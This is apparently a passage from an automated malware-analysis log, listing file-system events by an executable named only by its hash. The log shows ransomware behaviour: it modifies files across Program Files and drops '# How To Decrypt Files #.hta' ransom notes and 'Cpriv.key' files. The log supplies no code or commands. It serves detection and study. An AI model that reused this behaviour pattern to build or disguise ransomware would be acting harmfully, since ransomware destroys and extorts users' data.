de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\VideoLAN\VLC\locale\ta\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Common Files\microsoft shared\Web Server Extensions\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Common Files\Microsoft Shared\ink\ipsrus.xml de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\META-INF\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\images\120DPI\(120DPI)notConnectedStateIcon.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Javascripts\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\brt.hyp de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Document Themes 14\Theme Colors\Equity.xml de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms\bg_TexturedBlue.gif de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-lib-uihandler_ja.jar de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Java\jre7\lib\cmm\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\BL00296_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0107708.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\1033\QuickStyles\Perspective.dotx de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Common Files\microsoft shared\VSTO\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Common Files\Microsoft Shared\THEMES14\BLENDS\PREVIEW.GIF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Common Files\Microsoft Shared\THEMES14\ECHO\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\HH00612_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\MEDIA\OFFICE14\BULLETS\BD21482_.GIF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\1033\PUBSPAPR\PDIR11F.GIF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\OutlookAutoDiscover\YAHOO.CO.UK.XML de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Common Files\Microsoft Shared\OFFICE14\Office Setup Controller\InfoPath.en-us\InfoPathMUI.XML de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\org-openide-explorer.jar de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\images\35.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\144DPI\(144DPI)alertIcon.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\AN01218_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\PUBBA\MSPUB2A.BDR de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.e4.ui.workbench.renderers.swt.nl_ja_4.4.0.v20140623020002.jar de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\html\dcommon\gifs\prodbig.gif de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\VDKHome\ENU\VDK10.STP de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jre7\lib\charsets.jar de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Annotations\Stamps\ENU\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\NA00042_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\FORMS\1033\RSSITEMS.ICO de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Microsoft Office\Office14\PUBWIZ\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.5\RedistList\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\requests\vlm_cmd.xml de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Windows Sidebar\Gadgets\SlideShow.Gadget\images\play_down.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\org-netbeans-modules-editor-mimelookup-impl.jar de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\BL00254_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files (x86)\Common Files\microsoft shared\Help\HxRuntime.HxS de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0099184.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\images\undocked_black_moon-full.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.0\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\VideoLAN\VLC\locale\tl\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Windows Sidebar\Gadgets\SlideShow.Gadget\en-US\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\DVD Maker\Shared\Common.fxh de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\rtf_decreaseindent.gif de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\SO00452_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\FormsStyles\Oasis\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\VideoLAN\VLC\locale\ar\LC_MESSAGES\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\DVD Maker\Shared\DvdStyles\BabyGirl\chapters-static.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0297725.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.e4.core.commands.nl_ja_4.4.0.v20140623020002.jar de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\FD00086_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\MEDIA\CAGCAT10\J0217698.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Microsoft Office\Office14\PROOF\1033\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Windows Sidebar\Gadgets\Currency.Gadget\images\combo-hover-right.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Common Files\Microsoft Shared\ink\nb-NO\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Common Files\Microsoft Shared\TextConv\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\PUBWIZ\DGZIP.DPV de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Windows Sidebar\Gadgets\Calendar.Gadget\images\bNext-hot.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\Groove\Sounds\Places\LASER.WAV de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms5\rtf_bullets.gif de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\FORMS\1033\MMSL.ICO de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\button_left.gif de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\PUBWIZ\DGPICCAP.DPV de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-netbeans-modules-keyring.xml de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PH01035U.BMP de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\1033\PUBSPAPR\PDIR35B.GIF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\FormsBlankPage.html de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\VideoLAN\VLC\plugins\audio_output\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\DVD Maker\Shared\DvdStyles\SpecialOccasion\SpecialNavigationRight_ButtonGraphic.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-netbeans-modules-editor-mimelookup.xml de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\MEDIA\CAGCAT10\J0199661.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms\FormsDoNotTrust.html de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms\FormsTemplates\Hiring Requisition - Customized.fdt de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\PUBWIZ\DGACCBOX.XML de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Stationery\1033\JUNGLE.HTM de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Common Files\Microsoft Shared\THEMES14\SUMIPNTG\SUMIPNTG.INF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0287645.JPG de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\1033\PUBSPAPR\ZPDIR20F.GIF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.console.nl_ja_4.4.0.v20140623020002.jar de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-netbeans-core-multiview.xml de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0099182.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Windows Sidebar\Gadgets\Calendar.Gadget\images\bPrev-down.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\1033\PUBSPAPR\PDIR32B.GIF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\meta\art\00_musicbrainz.luac de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\images\docked_gray_cloudy.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\MakeAccessible.api de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Google\Update\1.3.35.452\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jre7\lib\alt-rt.jar de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Document Themes 14\Theme Effects\Solstice.eftx de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0090027.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\SO00917_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Document Themes 14\Theme Effects\Urban.eftx de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\bg_VelvetRose.gif de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Windows Sidebar\Gadgets\Calendar.Gadget\en-US\calendar.html de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Common Files\Microsoft Shared\ink\fsdefinitions\oskpred\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\javafx.properties de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Templates\1033\Access\DataType\Tags.accft de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\VideoLAN\VLC\plugins\plugins.dat de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Google\Policies\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Common Files\Microsoft Shared\THEMES14\INDUST\THMBNAIL.PNG de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Common Files\System\Ole DB\en-US\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\CLIP.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0099179.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\MEDIA\OFFICE14\AUTOSHAP\BD18208_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Templates\1033\OriginReport.Dotx de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\AcroForm\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.core.databinding.beans.nl_ja_4.4.0.v20140623020002.jar de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-netbeans-core-startup.xml de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\BL00008_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms\FieldTypePreview\TEXTVIEW.JPG de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Microsoft Office\Office14\STARTUP\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Windows Sidebar\Gadgets\Currency.Gadget\en-US\css\currency.css de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Common Files\microsoft shared\Stationery\Peacock.htm de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\DVD Maker\Shared\DvdStyles\FlipPage\NavigationUp_ButtonGraphic.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.e4.ui.workbench.swt.nl_ja_4.4.0.v20140623020002.jar de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\DVD Maker\Shared\DvdStyles\BabyBoy\navSubpicture.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Indian\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\images\winXPBlue.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\ADVCMP.DIC de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\OUTLFLTR.DAT de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\server_issue.gif de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Common Files\Microsoft Shared\VSTO\10.0\1033\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\DVD Maker\Shared\DvdStyles\BabyBoy\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Common Files\microsoft shared\Help\1031\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PE00231_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Microsoft Sync Framework\v1.0\Runtime\x64\resources\1033\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\VideoLAN\VLC\locale\brx\LC_MESSAGES\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Common Files\Adobe AIR\Versions\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Google\Temp\GUM3C25.tmp\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Windows Sidebar\Gadgets\Clock.Gadget\en-US\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\DVD Maker\Shared\DvdStyles\ResizingPanels\NavigationUp_ButtonGraphic.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-openide-execution.xml de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms5\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Windows Sidebar\Gadgets\Clock.Gadget\en-US\js\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Common Files\Microsoft Shared\OFFICE14\Office Setup Controller\PROPLUS\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Document Themes 14\Trek.thmx de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-modules-core-kit_zh_CN.jar de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\VideoLAN\VLC\locale\de\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Microsoft Office\MEDIA\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\33.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\update_tracking\com-sun-tools-visualvm-coredump.xml de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\NA02413_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\html\dcommon\gifs\masterix.gif de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-openide-actions_ja.jar de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\MEDIA\OFFICE14\AUTOSHAP\BD18251_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\1033\PUBSPAPR\PDIR47F.GIF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\CommonData\UnreadIconImages.jpg de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\DVD Maker\Shared\DvdStyles\BabyBoy\BabyBoyScenesBackground_PAL.wmv de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.ui.nl_zh_4.4.0.v20140623020002.jar de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\DD01434_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\PUBWIZ\NEWS98.POC de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Windows Sidebar\Gadgets\Clock.Gadget\images\novelty_m.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Windows Sidebar\Gadgets\SlideShow.Gadget\images\blank.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Common Files\Microsoft Shared\ink\fsdefinitions\numbers\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rcp.intro.ja_5.5.0.165303.jar de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.feature_3.9.0.v20140827-1444\about.html de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program 